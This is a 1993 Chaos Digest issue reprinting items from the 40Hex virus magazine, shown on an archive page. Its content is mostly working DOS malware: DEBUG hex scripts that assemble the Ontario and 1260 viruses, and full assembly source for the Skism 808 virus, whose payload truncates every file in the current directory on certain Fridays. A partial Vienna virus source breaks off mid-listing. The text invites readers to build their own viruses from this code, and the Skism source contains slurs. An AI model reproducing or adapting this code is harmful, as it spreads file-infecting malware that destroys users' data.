Copy Link
Add to Bookmark
Report

Chaos Digest Volume 01 Numero 30

eZine's profile picture
Published in 
Chaos Digest
 · 4 years ago

  

Chaos Digest Mercredi 19 Mai 1993 Volume 1 : Numero 30
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.30 (19 Mai 1993)
File 1--40H VMag Issue 1 Volume 2 #008-11(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found on some French BBS. Back issues of
ChaosD can be found on the Internet as part of the Computer underground
Digest archives. They're accessible using anonymous FTP from:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 2 #008-11(1) (reprint)


40Hex Volume 1 Issue 2 0008

The Ontario Virus

Here a quick nice little virus from our boyz up north.

V Status: Rare
Discovered: July, 1990
Symptoms: .COM & .EXE growth; decrease in system and free memory;
hard disk errors in the case of extreme infections
Origin: Ontario, Canada
Eff Length: 512 Bytes
Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV
Removal Instructions: SCAN /D, or Delete infected files
General Comments:

The Ontario Virus was isolated by Mike Shields in Ontario, Canada
in July, 1990. The Ontario virus is a memory resident infector of
.COM, .EXE, and overlay files. It will infect COMMAND.COM.

The first time a program infected with the Ontario Virus is executed,
it will install itself memory resident above the top of system memory
but below the 640K DOS boundary. Total system memory and free memory
will be decreased by 2,048 bytes. At this time, the virus will
infect COMMAND.COM on the C: drive, increasing its length by 512 bytes.

Each time an uninfected program is executed on the system with the
virus memory resident, the program will become infected with the viral
code located at the end of the file. For .COM files, they will
increase by 512 bytes in all cases. For .EXE and overlay files, the
file length increase will be 512 - 1023 bytes. The difference in
length for .EXE and overlay files is because the virus will fill out
the unused space at the end of the last sector of the uninfected file
with random data (usually a portion of the directory) and then append
itself to the end of the file at the next sector. Systems using
a sector size of more than 512 bytes may notice larger file increases
for infected files. Infected files will always have a file length
that is a multiple of the sector size on the disk.

In the case of extreme infections of the Ontario Virus, hard disk
errors may be noticed.

Ontario uses a complex encryption routine, and a simple identification
string will not identify this virus.

---------------------------------------------------------------------------

n ontario.com
e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72
e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20
e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5
e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A
e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A
e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84
e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D
e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5
e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78
e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9
e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8
e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA
e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85
e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85
e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A
e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E
e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86
e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7
e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25
e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42
e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98
e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4
e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98
e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A
e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6
e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8
e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84
e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4
e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6
e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86
e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC
e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8
e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E
e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3

rcx
220
w
q

--------------------------------------------------------------------------
HR

+++++

40Hex Volume 1 Issue 2 0009

The 1260 Virus

Here's a nice little encrypting virus written in America.

Aliases: V2P1
V Status: Research
Discovery: January, 1990
Symptoms: .COM file growth
Origin: Minnesota, USA
Eff Length: 1,260 Bytes
Type Code: PNC - Parasitic Encrypting Non-Resident .COM Infector
Detection Method: ViruScan V57+, IBM Scan, Pro-Scan 1.4+, F-Prot 1.12+,
AVTK 3.5+, VirHunt 2.0+, NAV
Removal Instructions: CleanUp V57+, Pro-Scan 1.4+, F-Prot 1.12+,
VirHunt 2.0+
General Comments:

The 1260 virus was first isolated in January, 1990. This virus does not
install itself resident in memory, but is it extremely virulent at infecting
.COM files. Infected files will have their length increased by 1,260 bytes,
and the resulting file will be encrypted. The encryption key changes with
each infection which occurs.

The 1260 virus is derived from the original Vienna Virus, though it is highly
modified.

This virus was developed as a research virus by Mark Washburn, who wished to
show the anti-viral community why identification string scanners do not work
in all cases. The encryption used in 1260 is one of many possible cases of
the encryption which may occur with Washburn's later research virus, V2P2.

-----------------------------------------------------------------------------

n 1260.com
e 0100 E9 1D 00 6E 66 65 63 74 65 64 20 50 72 6F 67 72
e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20
e 0120 90 B8 89 86 4B B9 FD 04 FC 46 BF 47 01 90 2B DA
e 0130 31 0D 33 D1 2B D8 31 05 47 42 4B 40 90 E2 EE 4B
e 0140 4B 42 47 43 42 F8 47 FF 18 71 18 D2 A5 40 19 E2
e 0150 6D B4 08 F8 5C FA F4 A6 EB 08 55 F2 F4 73 82 1A
e 0160 65 C4 C4 4F 82 24 55 FA F4 7B B2 16 55 F4 E4 6F
e 0170 A2 00 1F F9 0C C2 F7 7D 06 73 32 66 F4 45 84 87
e 0180 3D 81 84 7A 77 5E 7F 04 40 C2 39 D7 C8 FA 28 C1
e 0190 B6 E1 0D 64 E6 FC 40 D9 39 D3 38 FA 71 A4 38 0A
e 01A0 6B E1 82 38 C3 71 22 77 36 13 F4 42 EE 37 C5 E0
e 01B0 B2 6C E2 CA E4 45 F4 F6 AA A4 75 30 68 FA A8 BE
e 01C0 05 83 F7 A9 BC FF F5 5B 5B 86 18 15 0F A5 E2 6E
e 01D0 9B 17 6E 39 64 3D 54 F7 7E 0D 1E CD 65 37 46 B9
e 01E0 31 C3 B0 C3 2C DF F7 3B EB A5 D3 79 EB D7 E5 6C
e 01F0 1B C5 6E 91 11 7A 32 56 F5 5F C9 CC 81 F0 B9 87
e 0200 F1 87 2F 6C 71 37 4B F7 F5 A8 EA 7E 83 0F 65 1A
e 0210 1A 97 E6 57 B9 51 7C 89 07 78 06 76 33 6D C5 7E
e 0220 C3 C3 36 63 4E 08 41 B9 7E 25 74 35 54 FB 5C E4
e 0230 E5 2E C4 0C E3 6B 39 43 BA 3E D4 84 F6 10 9A CB
e 0240 8E 87 F2 07 21 E4 CE EF 86 19 73 4C 09 FC E2 18
e 0250 96 01 61 5C 19 FC F8 84 2C 7F 8C 02 A4 7D 04 3F
e 0260 C2 68 68 FC C2 89 08 AE 4A F4 B1 7B 24 7D 20 41
e 0270 E2 29 C3 69 AC 0A 4A F1 B1 75 13 0E 0D 77 54 01
e 0280 40 25 82 4D A3 44 F0 CD 79 22 73 32 53 FC 2F C1
e 0290 91 E0 0B 88 E3 30 79 28 4A F4 A5 3D D3 75 8C 38
e 02A0 4B 92 38 74 FD 45 F1 F0 79 22 73 32 62 FC 2F C1
e 02B0 2E BF CB FA 2E 09 3A F3 F2 38 B0 C7 E3 30 7A CF
e 02C0 0F 49 C1 3E 85 F3 FD 45 FD FB 30 DE 8E F0 04 FA
e 02D0 EC 27 67 36 21 2C A9 37 AC 37 78 57 FE F3 01 2F
e 02E0 A4 4F 59 CF 4C 32 20 FB 31 9F 12 01 31 87 18 00
e 02F0 42 E8 21 7D F6 FE 49 D3 30 DA CE 2E 31 0D FA D9
e 0300 7D 47 4C A6 A9 F2 31 37 BE BD 0D 33 1A 31 12 EF
e 0310 21 CF CC 2A E9 3F 31 BA BB 13 31 78 F3 77 CA CF
e 0320 94 07 CD 4E 0C D4 FC 76 71 FA FD 33 6D 8B 17 EF
e 0330 66 AD 1D 23 D3 44 BB 15 74 7F F9 FF 31 1A 6F F1
e 0340 C1 08 8F E0 D0 F0 30 2E A7 24 7D 3D DB F2 2B A8
e 0350 0A ED EC 06 F8 F3 75 80 12 7B 3F EE FC 3E EA 2F
e 0360 8A 2C 4F CE 00 BE 58 FF FD 7B 3F EE FC 3E 5B B1
e 0370 14 EA 55 EC EC 79 8A 12 30 00 87 38 D9 F2 7F 2A
e 0380 07 CC 62 A5 4B BD 56 75 B2 16 7D 17 4A F1 D7 21
e 0390 98 E3 56 EE EC 1A 4A FE 17 17 30 75 8A 1E 9A 45
e 03A0 32 06 6D D6 F5 F2 7D 38 AB FA 30 C2 41 35 E2 EC
e 03B0 67 3D 1F 4A B2 A9 14 6C FC FF FA FE AC 0D EE C3
e 03C0 E4 90 2E 32 E1 F7 31 9C EB E7 45 FF BF 4A ED EF
e 03D0 57 EB ED 22 CC 81 F2 4B BD 42 FE FF 31 27 92 19
e 03E0 4C 09 5E CF 00 D2 76 A9 07 70 B3 07 7C 12 0D 10
e 03F0 6C 22 F2 EF 55 F2 AA 32 DC 4F C3 32 DC 4B 8C CC
e 0400 06 C5 7B 04 5B 72 3F 5E FD 36 DC E1 76 A5 11 61
e 0410 B3 15 59 F5 20 D2 E2 A6 CE 3B CE 24 CE 21 FE 39
e 0420 46 2E 72 CF CC A4 15 51 FD 38 76 B1 0D 72 1C D3
e 0430 6C 6A 2C A7 7F 22 34 2E 34 2A 34 76 B3 03 8C EE
e 0440 0A 0B 5C 4E 3E 33 07 2F 2E A1 3D A4 AE 33 06 35
e 0450 11 6D 3E 99 17 FB 2E 77 3F 29 1E AC 29 7B 06 94
e 0460 8E 1F CD 8A 22 7B 0E 0F 5A 3B 44 FC FE 18 30 13
e 0470 65 2A CD AA 08 CB B8 1A 8B 0B 3D AF 75 2C DE DA
e 0480 05 FF 8C 73 C9 F2 77 8A 1A 54 CE F8 74 B7 E9 E0
e 0490 EF 60 A9 EB B0 A8 A5 33 AD 73 22 AC A8 7B B8 28
e 04A0 62 F8 CA 46 89 F7 DA 02 76 BF F9 A2 A6 AB 21 70
e 04B0 F0 B8 56 EC EE A0 E1 77 B8 14 D3 7E FE 0A AD 03
e 04C0 0D 80 4B E3 20 96 FD 5C F9 FB F3 A7 5E F5 ED 4C
e 04D0 E3 EB 16 B7 F2 6E 3E 63 E3 AB 45 FF FD A3 D2 44
e 04E0 8B 2B 37 6C C1 F3 76 B9 21 58 F9 FF 76 B5 33 4C
e 04F0 EB EB 66 A9 0F 50 F3 FF 06 A3 E2 62 3E 4C CA 8E
e 0500 35 02 0B 36 70 F7 05 03 BB B0 6D CE F8 C2 E0 DC
e 0510 3C D8 34 C4 35 D8 24 D4 27 6B BD B8 BE B5 8F 37
e 0520 86 5B 2F 28 CE F3 FE FC FE FD FC F6 FC F9 EC E4
e 0530 EC E7 EC E2 EF FD FF EF FF E9 FF EB FF E5 0F 17
e 0540 0F 11 0C 13 0C EE FD E0 FD E5 FD DE FD D3 ED CC
e 0550 ED C9 ED CA 67 BC 14 75 BA 10 77 00 7D 1D 7A CD
e 0560 24 EB CC 7A 8C 4B 10 FA 77 2C 7D 14 21 F1 21 CF
e 0570 70 BA 67 A0 04 79 BA 14 77 04 7D 11 4A F1 64 8D
e 0580 8C D2 11 4D BD F7 CD F3 BC BD 1E 06 3F 19 F9 A7
e 0590 05 F7 EC C4 C2 B1 B3 B3 FC AA BD AA B4 CF 98 87
e 05A0 82 93 E2 8D 83 BF FC B3 FC FA FC FE FC F2 EC EE
e 05B0 EC EA EC EE EC F2 FC FE FC FA FC FE FC F2 0C 0F
e 05C0 0D 0B 0D 0F 0D F3 FD FF FD FB FD FF FD F3 ED EF
e 05D0 ED EB ED EF ED F3 FD FF FD FB FD FF FD F3 CF F0
e 05E0 F2 F4 F2 F0 F2 CC C2 BC B2 B6 FE FC FD F3 ED EF
e 05F0 ED EB ED CF CA 97 A6 ED DD FB FD FF A9 BA C3 D6
e 0600 A3 C8 C2 C2 8D BE FD B2 FD FB FD FF 1A 1A 1A 1A

rcx
50C
w
q

--------------------------------------------------------------------------
HR
+++++

40Hex Volume 1 Issue 2 0010

The 808 Virus

Here another virus from Skism. It's a quick overwriting virus but
you can use the source code to write your own viruses.

--------------------------------------------------------------------------

;The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods.

filename EQU 30 ;used to find file name
fileattr EQU 21 ;used to find file attributes
filedate EQU 24 ;used to find file date
filetime EQU 22 ;used to find file time

code_start EQU 0100h ;start of all .COM files
virus_size EQU 808 ;TR 808

code segment 'code'
assume cs:code,ds:code,es:code
org code_start

main proc near

jmp virus_start

encrypt_val db 00h

virus_start:

call encrypt ;encrypt/decrypt file
jmp virus ;go to start of code

encrypt:

push cx
mov bx,offset virus_code ;start encryption at data

xor_loop:

mov ch,[bx] ;read current byte
xor ch,encrypt_val ;get encryption key
mov [bx],ch ;switch bytes
inc bx ;move bx up a byte
cmp bx,offset virus_code+virus_size
;are we done with the encryption
jle xor_loop ;no? keep going
pop cx
ret

infectfile:

mov dx,code_start ;where virus starts in memory
mov bx,handle ;load bx with handle
push bx ;save handle on stack
call encrypt ;encrypt file
pop bx ;get back bx
mov cx,virus_size ;number of bytes to write
mov ah,40h ;write to file
int 21h
push bx
call encrypt ;fix up the mess
pop bx
ret

virus_code:

wildcards db "*",0 ;search for directory argument
filespec db "*.EXE",0 ;search for EXE file argument
filespec2 db "*.*",0
rootdir db "\",0 ;argument for root directory
dirdata db 43 dup (?) ;holds directory DTA
filedata db 43 dup (?) ;holds files DTA
diskdtaseg dw ? ;holds disk dta segment
diskdtaofs dw ? ;holds disk dta offset
tempofs dw ? ;holds offset
tempseg dw ? ;holds segment
drivecode db ? ;holds drive code
currentdir db 64 dup (?) ;save current directory into this
handle dw ? ;holds file handle
orig_time dw ? ;holds file time
orig_date dw ? ;holds file date
orig_attr dw ? ;holds file attr
idbuffer dw 2 dup (?) ;holds virus id

virus:

mov ax,3000h ;get dos version
int 21h
cmp al,02h ;is it at least 2.00?
jb bus1 ;won't infect less than 2.00
mov ah,2ch ;get time
int 21h
mov encrypt_val,dl ;save m_seconds to encrypt val so
;theres 100 mutations possible
setdta:

mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h

newdir:

mov ah,19h ;get drive code
int 21h
mov dl,al ;save drivecode
inc dl ;add one to dl, because functions differ
mov ah,47h ;get current directory
mov si, offset currentdir ;buffer to save directory in
int 21h

mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h

scandirs:

mov cx,13h ;include hidden/ro directorys
mov dx, offset wildcards ;look for '*'
mov ah,4eh ;find first file
int 21h
cmp ax,12h ;no first file?
jne dirloop ;no dirs found? bail out

bus1:

jmp bus

dirloop:

mov ah,4fh ;find next file
int 21h
cmp ax,12h
je bus ;no more dirs found, roll out

chdir:

mov dx,offset dirdata+filename;point dx to fcb - filename
mov ah,3bh ;change directory
int 21h ;

mov ah,2fh ;get current dta address
int 21h
mov [diskdtaseg],es ;save old segment
mov [diskdtaofs],bx ;save old offset
mov dx,offset filedata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h

scandir:

mov cx,07h ;find any attribute
mov dx,offset filespec ;point dx to "*.COM",0
mov ah,4eh ;find first file function
int 21h
cmp ax,12h ;was file found?
jne transform

nextexe:

mov ah,4fh ;find next file
int 21h
cmp ax,12h ;none found
jne transform ;found see what we can do

mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h
mov ah,1ah ;set dta address
mov ds,[diskdtaseg] ;restore old segment
mov dx,[diskdtaofs] ;restore old offset
int 21h
jmp dirloop

bus:

jmp rollout

transform:

mov ah,2fh ;temporally store dta
int 21h
mov [tempseg],es ;save old segment
mov [tempofs],bx ;save old offset
mov dx, offset filedata + filename

mov bx,offset filedata ;save file...
mov ax,[bx]+filedate ;date
mov orig_date,ax ;
mov ax,[bx]+filetime ;time
mov orig_time,ax ; and
mov ax,[bx]+fileattr
mov ax,4300h
int 21h
mov orig_attr,cx
mov ax,4301h ;change attributes
xor cx,cx ;clear attributes
int 21h
mov ax,3d00h ;open file - read
int 21h
jc fixup ;error - find another file
mov handle,ax ;save handle
mov ah,3fh ;read from file
mov bx,handle ;move handle to bx
mov cx,02h ;read 2 bytes
mov dx,offset idbuffer ;save to buffer
int 21h

mov ah,3eh ;close file for now
mov bx,handle ;load bx with handle
int 21h

mov bx, idbuffer ;fill bx with id string
cmp bx,02ebh ;infected?
jne doit ;same - find another file

fixup:
mov ah,1ah ;set dta address
mov ds,[tempseg] ;restore old segment
mov dx,[tempofs] ;restore old offset
int 21h
jmp nextexe

doit:

mov dx, offset filedata + filename
mov ax,3d02h ;open file read/write access
int 21h
mov handle,ax ;save handle

call infectfile

;mov ax,3eh ;close file
;int 21h

rollout:

mov ax,5701h ;restore original
mov bx,handle
mov cx,orig_time ;time and
mov dx,orig_date ;date
int 21h

mov ax,4301h ;restore original attributes
mov cx,orig_attr
mov dx,offset filedata + filename
int 21h
;mov bx,handle
;mov ax,3eh ;close file
;int 21h
mov ah,3bh ;try to fix this
mov dx,offset rootdir ;for speed
int 21h
mov ah,3bh ;change directory
mov dx,offset currentdir ;back to original
int 21h
mov ah,2ah ;check system date
int 21h
cmp cx,1991 ;is it at least 1991?
jb audi ;no? don't do it now
cmp dl,25 ;is it the 25th?
jb audi ;not yet? quit
cmp al,5 ;is Friday?
jne audi ;no? quit
mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h
mov ah,4eh ;find first file
mov cx,7h
mov dx,offset filespec2 ;offset *.*

Loops:

int 21h
jc audi ;error? then quit
mov ax,4301h ;find all normal files
xor cx,cx
int 21h
mov dx,offset dirdata + filename
mov ah,3ch ;fuck up all files in current dir
int 21h
jc audi ;error? quit
mov ah,4fh ;find next file
jmp loops

audi:

mov ax,4c00h ;end program
int 21h

;The below is just text to pad out the virus size to 808 bytes. Don't
;just change the text and claim that this is your creation.

words_ db "Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods",0
words2 db " Dont alter this code into your own strain, faggit. ",0
words3 db " HR/SSS NYCity, this is the fifth of many, many more....",0
words4 db " You sissys.....",0

main endp
code ends
end main

+++++

40Hex Volume 1 Issue 2 0011

Vienna and Violator Viruses

The Vienna virus, since it's source code was released, has become
one of the most common viruses ever. Not only that but there are
over 20 known strains of this virus. We at 40Hex want to add on to
the list by giving out the source for the orginal Vienna virus as
well as the Violator-B source by Rabid.

---------------------------------------------------------------------------

MOV_CX MACRO X
DB 0B9H
DW X
ENDM

CODE SEGMENT
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
ORG $+0100H

;***************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, follow. by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;***************************************************************************

VCODE: JMP virus

;This was the rest of the original .COM file. Tiny and simple, this time

NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP

;************************************************************
; The actual virus starts here
;************************************************************

v_start equ $

virus: PUSH CX
MOV DX,OFFSET vir_dat ;This is where the virus data starts.
; The 2nd and 3rd bytes get modified.
CLD ;Pointers will be auto INcremented
MOV SI,DX ;Access data as offset from SI
ADD SI,first_3 ;Point to original 1st 3 bytes of .COM
MOV DI,OFFSET 100H ;cause all .COM files start at 100H
MOV CX,3
REPZ MOVSB ;Restore original first 3 bytes of .COM
MOV SI,DX ;Keep SI pointing to the data area

;*************************************************************
; Check the DOS version
;*************************************************************

MOV AH,30H
INT 21H

CMP AL,0 ;0 means it's version 1.X

JNZ dos_ok ;For version 2.0 or greater
JMP quit ;Don't try to infect version 1.X

;*************************************************************
; Here if the DOS version is high enough for this to work
;*************************************************************

dos_ok: PUSH ES

;*************************************************************
; Get DTA address into ES:BX
;*************************************************************

MOV AH,2FH
INT 21H

;*************************************************************
; Save the DTA address
;*************************************************************

MOV [SI+old_dta],BX
MOV [SI+old_dts],ES ;Save the DTA address

POP ES

;*************************************************************
; Set DTA to point inside the virus data area
;*************************************************************

MOV DX,dta ;Offset of new DTA in virus data area
; NOP ;MASM will add this NOP here
ADD DX,SI ;Compute DTA address
MOV AH,1AH
INT 21H ;Set new DTA to inside our own code

PUSH ES
PUSH SI
MOV ES,DS:2CH
MOV DI,0 ;ES:DI points to environment

;************************************************************
; Find the "PATH=" string in the environment
;************************************************************

find_path:
POP SI
PUSH SI ;Get SI back
ADD SI,env_str ;Point to "PATH=" string in data area
LODSB
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long
REPNZ SCASB ;Search for first character
MOV CX,4

------------------------------

End of Chaos Digest #1.30
************************************

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT